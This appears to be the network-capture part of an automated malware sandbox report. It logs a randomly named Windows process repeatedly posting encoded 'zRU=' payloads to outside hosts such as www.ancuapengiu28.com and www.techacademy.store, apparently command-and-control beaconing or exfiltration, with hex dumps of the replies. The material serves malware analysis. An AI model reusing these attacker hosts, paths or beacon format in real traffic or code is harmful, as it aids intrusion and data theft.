                          Set-Cookie: 4c7a9=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjQzODFcIjoxNzIxMjgyMjc3fSxcImNhbXBhaWduc1wiOntcIjE0MTFcIjoxNzIxMjgyMjc3fSxcInRpbWVcIjoxNzIxMjgyMjc3fSJ9.cEgJxTru3VcGj36LkfpVAwnt-DXFVVdTf6UD0PkBIFs; expires=Fri, 03 Feb 2079 11:55:54 GMT; path=/
                          Set-Cookie: a90624f7lp1411=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoiODA2In0.k6xjJGpwMm2_CBJwU3JzuC-mEUO2nVnQcsQIqhR59a8; expires=Fri, 09 May 198397 02:57:57 GMT; path=/
                          Set-Cookie: a90624f7lp1411ip=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoiXCI4LjQ2LjEyMy4zM1wiIn0.8p3iaUjw-d2CpKgR-5Ws_zhLYUW2RmptlB9M-1uFdK4; expires=Fri, 09 May 198397 02:57:57 GMT; path=/
                          Vary: Accept-Encoding
                          Access-Control-Allow-Origin: *
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 3c 62 61 73 65 20 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 2f 6e 6f 76 69 65 2d 7a 61 63 6f 6e 69 2d 73 2d 31 2d 69 79 75 6e 79 61 2d 32 30 32 34 2d 67 6f 64 61 2f 69 6e 64 65 78 2e 68 74 6d 6c 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e d0 92 d0 b0 d0 b6 d0 bd d1 8b d0 b5 20 d0 bd d0 be d0 b2 d0 be d1 81 d1 82 d0 b8 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20
                          Data Ascii: <!DOCTYPE html> <html> <head><base href="/lander/novie-zaconi-s-1-iyunya-2024-goda/index.html"> <title> </title> <meta charset="UTF-8"> <meta
Jul 18, 2024 07:57:57.804285049 CEST | 1236 | IN | Data Raw: 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74
                          Data Ascii: http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <span id="0aa54c9b-2ec8-d0f0-247f-aebdff4fa0d5"></span> <script src="policy/validator.js"></script>
Jul 18, 2024 07:57:57.804322958 CEST | 1236 | IN | Data Raw: bd d1 8b d0 bc 20 d0 bc d0 b0 d1 80 d1 88 d1 80 d1 83 d1 82 d0 b0 d0 bc 2e 20 d0 92 d1 81 d0 b5 20 d0 be d0 bd d0 b8 20 d0 b1 d1 83 d0 b4 d1 83 d1 82 20 d0 be d0 b1 d1 8f d0 b7 d0 b0 d0 bd d1 8b 20 d0 bf d1 80 d0 be d0 b9 d1 82 d0 b8 20 d0 b0 d1
                          Data Ascii: . .<b
Jul 18, 2024 07:57:57.805236101 CEST | 672 | IN | Data Raw: d0 bd d1 8b d0 b5 20 d0 bd d0 b5 d1 80 d0 b0 d0 b1 d0 be d1 87 d0 b8 d0 b5 20 d0 b4 d0 bd d0 b8 20 d0 b1 d1 83 d0 b4 d1 83 d1 82 20 d1 82 d0 be d0 bb d1 8c d0 ba d0 be 20 d0 b2 20 d0 bd d0 be d1 8f d0 b1 d1 80 d0 b5 2e 3c 62 72 20 2f 3e 0d 0a 3c
                          Data Ascii: .<br /><br /> <br /> 1
Jul 18, 2024 07:57:57.805274010 CEST | 1236 | IN | Data Raw: d1 83 d1 87 d0 b5 d1 82 d0 b0 2c 20 d0 bf d0 be 20 d0 bc d0 b5 d1 81 d1 82 d1 83 20 d0 bf d0 be d1 81 d0 bb d0 b5 d0 b4 d0 bd d0 b5 d0 b9 20 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d0 b0 d1 86 d0 b8 d0 b8 2e 20 d0 a0 d0 b5 d0 b7 d0 b8 d0 b4 d0
                          Data Ascii: , . , ,
Jul 18, 2024 07:57:57.806301117 CEST | 1236 | IN | Data Raw: d0 b5 20 d0 bd d0 b0 d1 80 d1 83 d1 88 d0 b5 d0 bd d0 b8 d0 b5 20 d1 88 d1 82 d1 80 d0 b0 d1 84 20 d1 83 d0 b2 d0 b5 d0 bb d0 b8 d1 87 d0 b8 d0 b2 d0 b0 d0 b5 d1 82 d1 81 d1 8f 20 d0 b4 d0 be 20 32 30 20 d1 82 d1 8b d1 81 2e 20 d1 80 d1 83 d0 b1
                          Data Ascii: 20 . .<br /><br /> , ,
Jul 18, 2024 07:57:57.806314945 CEST | 1236 | IN | Data Raw: d1 83 d1 87 d0 b0 d1 81 d1 82 d0 bd d0 b8 d0 ba d0 b8 2e 20 d0 9a d1 83 d0 b4 d0 b0 20 d0 bc d0 be d0 b6 d0 bd d0 be 20 d0 be d1 82 d0 bd d0 b5 d1 81 d1 82 d0 b8 20 d0 bc d0 b5 d0 bb d0 be d1 87 d1 8c 2c 20 d0 bc d0 be d0 b6 d0 bd d0 be 20 d0 bf
                          Data Ascii: . , .<br /><br /> ,
Jul 18, 2024 07:57:57.806349993 CEST | 690 | IN | Data Raw: 81 d0 be d0 b3 d0 bb d0 b0 d1 88 d0 b0 d0 b5 d1 82 d0 b5 d1 81 d1 8c 20 d1 81 20 d0 bd d0 b0 d1 88 d0 b5 d0 b9 20 3c 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65
                          Data Ascii: <a style="color: #149dcc; text-decoration: none;" href="./policy.html"> </a>.</


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49727 | 172.96.191.69 | 80 | 5956 | C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe
Timestamp | Bytes transferred | Direction | Data
Jul 18, 2024 07:58:18.202198982 CEST | 702 | OUT | POST /d3vb/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.ancuapengiu28.com
                          Origin: http://www.ancuapengiu28.com
                          Referer: http://www.ancuapengiu28.com/d3vb/
                          Cache-Control: no-cache
                          Content-Type: application/x-www-form-urlencoded
                          Connection: close
                          Content-Length: 208
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                          Data Raw: 7a 52 55 3d 4e 42 6e 77 2f 54 5a 31 6c 51 42 50 73 66 61 33 72 70 61 4d 74 49 41 31 59 6e 33 6a 66 33 46 33 71 32 4e 36 2b 6f 59 49 4b 52 62 61 73 30 48 47 57 54 62 46 79 79 66 54 4c 63 44 48 55 4a 74 77 48 65 36 30 72 63 6d 70 6f 39 56 33 4b 75 36 36 58 54 34 6c 39 55 4a 4a 7a 6a 33 6c 54 75 30 57 6e 59 50 78 70 4d 61 4d 7a 35 37 47 68 4e 38 46 76 45 38 52 31 57 37 54 58 78 55 68 67 50 4c 55 51 38 39 53 44 6a 62 41 34 41 42 2f 70 57 77 32 47 46 43 36 52 59 2f 72 74 32 55 7a 7a 6c 4d 44 33 31 35 43 56 42 58 55 6a 35 39 50 73 45 6c 57 77 2f 55 39 6f 59 6f 53 4e 39 53 39 58 4d 56 43 66 6b 4c 6a 55 39 75 50 5a 71 77 66
                          Data Ascii: zRU=NBnw/TZ1lQBPsfa3rpaMtIA1Yn3jf3F3q2N6+oYIKRbas0HGWTbFyyfTLcDHUJtwHe60rcmpo9V3Ku66XT4l9UJJzj3lTu0WnYPxpMaMz57GhN8FvE8R1W7TXxUhgPLUQ89SDjbA4AB/pWw2GFC6RY/rt2UzzlMD315CVBXUj59PsElWw/U9oYoSN9S9XMVCfkLjU9uPZqwf
Jul 18, 2024 07:58:19.095880032 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 796
                          date: Thu, 18 Jul 2024 05:58:18 GMT
                          server: LiteSpeed
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          2 | 192.168.2.6 | 49729 | 172.96.191.69 | 80 | 5956 | C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 07:58:20.857610941 CEST | 726 | OUT | POST /d3vb/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.ancuapengiu28.com
                          Origin: http://www.ancuapengiu28.com
                          Referer: http://www.ancuapengiu28.com/d3vb/
                          Cache-Control: no-cache
                          Content-Type: application/x-www-form-urlencoded
                          Connection: close
                          Content-Length: 232
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                          Data Raw: 7a 52 55 3d 4e 42 6e 77 2f 54 5a 31 6c 51 42 50 74 2f 4b 33 74 4f 4f 4d 72 6f 41 32 57 48 33 6a 49 6e 46 4e 71 32 4a 36 2b 70 4d 59 4b 6a 2f 61 73 56 33 47 56 57 76 46 7a 79 66 54 41 38 44 47 61 70 74 76 48 65 48 42 72 64 61 70 6f 39 70 33 4b 75 4b 36 58 69 34 36 2f 45 4a 50 6f 7a 33 6a 58 75 30 57 6e 59 50 78 70 4e 2f 45 7a 34 54 47 6d 39 73 46 76 6c 38 51 72 47 37 51 66 52 55 68 33 66 4c 51 51 38 39 67 44 69 32 49 34 47 46 2f 70 58 41 32 43 48 71 35 65 59 2f 79 6e 57 56 68 2b 55 31 37 34 32 55 57 53 77 4f 7a 34 4a 68 75 6b 53 6b 4d 73 4d 55 65 36 49 49 51 4e 2f 4b 50 58 73 56 6f 64 6b 7a 6a 47 71 69 6f 57 65 56 38 2b 73 58 65 52 61 68 4a 45 7a 6a 45 4d 63 54 6c 30 6b 53 59 4f 51 3d 3d
                          Data Ascii: zRU=NBnw/TZ1lQBPt/K3tOOMroA2WH3jInFNq2J6+pMYKj/asV3GVWvFzyfTA8DGaptvHeHBrdapo9p3KuK6Xi46/EJPoz3jXu0WnYPxpN/Ez4TGm9sFvl8QrG7QfRUh3fLQQ89gDi2I4GF/pXA2CHq5eY/ynWVh+U1742UWSwOz4JhukSkMsMUe6IIQN/KPXsVodkzjGqioWeV8+sXeRahJEzjEMcTl0kSYOQ==
                          Jul 18, 2024 07:58:21.769669056 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 796
                          date: Thu, 18 Jul 2024 05:58:21 GMT
                          server: LiteSpeed
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          3 | 192.168.2.6 | 49730 | 172.96.191.69 | 80 | 5956 | C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 07:58:23.449057102 CEST | 1739 | OUT | POST /d3vb/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.ancuapengiu28.com
                          Origin: http://www.ancuapengiu28.com
                          Referer: http://www.ancuapengiu28.com/d3vb/
                          Cache-Control: no-cache
                          Content-Type: application/x-www-form-urlencoded
                          Connection: close
                          Content-Length: 1244
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                          Data Raw: 7a 52 55 3d 4e 42 6e 77 2f 54 5a 31 6c 51 42 50 74 2f 4b 33 74 4f 4f 4d 72 6f 41 32 57 48 33 6a 49 6e 46 4e 71 32 4a 36 2b 70 4d 59 4b 6a 33 61 74 6a 6a 47 57 78 7a 46 77 79 66 54 4e 63 44 44 61 70 73 7a 48 65 66 46 72 64 57 54 6f 37 74 33 4b 50 71 36 52 51 51 36 32 45 4a 50 68 54 33 6d 54 75 30 50 6e 59 66 39 70 4d 50 45 7a 34 54 47 6d 37 51 46 6d 55 38 51 73 32 37 54 58 78 55 6c 67 50 4c 34 51 38 6c 4b 44 69 44 71 34 32 6c 2f 73 48 51 32 41 54 4b 35 54 59 2f 77 67 57 55 6b 2b 56 4a 6b 34 32 49 61 53 77 72 57 34 49 5a 75 30 44 5a 67 33 50 6b 78 75 34 6f 6f 64 39 61 6f 54 62 56 57 53 6b 6a 38 43 37 79 56 50 4b 4e 6f 7a 71 54 33 46 6f 56 4d 46 78 66 72 4c 64 53 72 38 55 57 51 53 47 72 61 66 31 6b 33 30 49 54 41 37 79 54 34 52 2b 2b 49 48 2b 76 50 50 4b 52 63 34 45 69 4e 4b 42 55 4d 70 77 55 4d 6b 77 2f 44 49 58 53 36 74 2f 65 55 75 57 50 59 59 4f 78 39 7a 54 53 62 59 46 76 33 57 4a 75 55 48 50 6d 6b 4f 44 4e 4a 61 6c 33 55 54 2f 4b 69 6e 55 69 7a 7a 70 65 34 54 74 63 41 74 4d 48 67 38 35 50 68 59 37 [TRUNCATED]
                          Data Ascii: zRU= [TRUNCATED]
                          Jul 18, 2024 07:58:24.374906063 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 796
                          date: Thu, 18 Jul 2024 05:58:24 GMT
                          server: LiteSpeed
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          4 | 192.168.2.6 | 49731 | 172.96.191.69 | 80 | 5956 | C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 07:58:26.022748947 CEST | 432 | OUT | GET /d3vb/?zRU=ADPQ8lRoxSByg+mG86XNue8ofAjmBVNA7RwbiYYLDlrQv278ITvGwT6pBJPFcJ5Oe9Xpz76I5qFPHvmWTw5Y21ldoEnhDfgwrYz6sOCTt4XHqos0nmhmqCv1SSwJ5dTjY+t3Vmc=&hR1p0=vfrlb HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Language: en-US,en
                          Host: www.ancuapengiu28.com
                          Connection: close
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                          Jul 18, 2024 07:58:26.973881006 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 796
                          date: Thu, 18 Jul 2024 05:58:26 GMT
                          server: LiteSpeed
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          5 | 192.168.2.6 | 49732 | 13.248.169.48 | 80 | 5956 | C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 07:58:32.085448027 CEST | 702 | OUT | POST /cf3x/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.techacademy.store
                          Origin: http://www.techacademy.store
                          Referer: http://www.techacademy.store/cf3x/
                          Cache-Control: no-cache
                          Content-Type: application/x-www-form-urlencoded
                          Connection: close
                          Content-Length: 208
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                          Data Raw: 7a 52 55 3d 53 6a 4d 30 70 49 43 4d 46 44 62 6a 4e 32 6b 41 61 46 6c 64 55 71 49 66 4f 44 73 47 67 4a 4e 64 78 5a 76 61 47 65 51 42 55 72 64 33 74 77 4d 34 49 42 70 47 53 69 39 4d 36 66 42 63 39 31 6d 61 59 74 6e 68 61 6c 53 4e 57 70 46 70 7a 5a 43 41 4c 79 41 56 55 54 77 4b 7a 4c 34 2b 4c 63 50 78 76 69 54 47 61 75 56 71 5a 61 6f 54 58 42 4e 4f 4c 6d 62 67 6b 70 44 49 34 30 46 65 77 38 52 77 45 6a 74 4a 35 62 67 69 44 32 61 52 35 2f 6a 54 78 37 42 78 4a 77 78 42 6b 58 77 59 39 57 6e 2b 63 39 65 31 4c 64 51 72 59 66 36 58 70 4c 7a 49 39 6c 76 2b 43 53 72 70 4a 34 6d 71 65 30 59 6e 44 4c 32 48 33 70 50 6a 37 67 6d 48
                          Data Ascii: zRU=SjM0pICMFDbjN2kAaFldUqIfODsGgJNdxZvaGeQBUrd3twM4IBpGSi9M6fBc91maYtnhalSNWpFpzZCALyAVUTwKzL4+LcPxviTGauVqZaoTXBNOLmbgkpDI40Few8RwEjtJ5bgiD2aR5/jTx7BxJwxBkXwY9Wn+c9e1LdQrYf6XpLzI9lv+CSrpJ4mqe0YnDL2H3pPj7gmH


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          6 | 192.168.2.6 | 49733 | 13.248.169.48 | 80 | 5956 | C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 07:58:34.660021067 CEST | 726 | OUT | POST /cf3x/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.techacademy.store
                          Origin: http://www.techacademy.store
                          Referer: http://www.techacademy.store/cf3x/
                          Cache-Control: no-cache
                          Content-Type: application/x-www-form-urlencoded
                          Connection: close
                          Content-Length: 232
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                          Data Raw: 7a 52 55 3d 53 6a 4d 30 70 49 43 4d 46 44 62 6a 43 33 55 41 62 6d 39 64 42 36 49 63 4e 44 73 47 72 70 4e 52 78 5a 6a 61 47 63 38 52 55 39 4e 33 71 52 38 34 5a 7a 42 47 56 69 39 4d 78 2f 42 64 77 56 6d 46 59 74 72 54 61 6b 2b 4e 57 70 52 70 7a 5a 53 41 4b 41 6f 55 55 44 77 4d 2b 72 34 34 50 63 50 78 76 69 54 47 61 75 52 54 5a 61 77 54 58 78 64 4f 4b 48 62 6a 34 5a 44 4c 37 30 46 65 37 63 52 72 45 6a 74 52 35 65 34 49 44 30 69 52 35 2b 54 54 77 6f 5a 32 51 41 78 48 71 33 78 39 36 6b 4f 4e 45 4d 36 32 42 4f 73 58 4f 4e 4b 71 73 39 79 53 68 57 76 64 51 43 4c 72 4a 36 2b 59 65 55 59 4e 42 4c 4f 48 6c 2b 44 45 30 55 44 6b 56 4b 64 34 4b 7a 38 41 30 52 54 4e 64 76 52 72 78 43 61 74 55 51 3d 3d
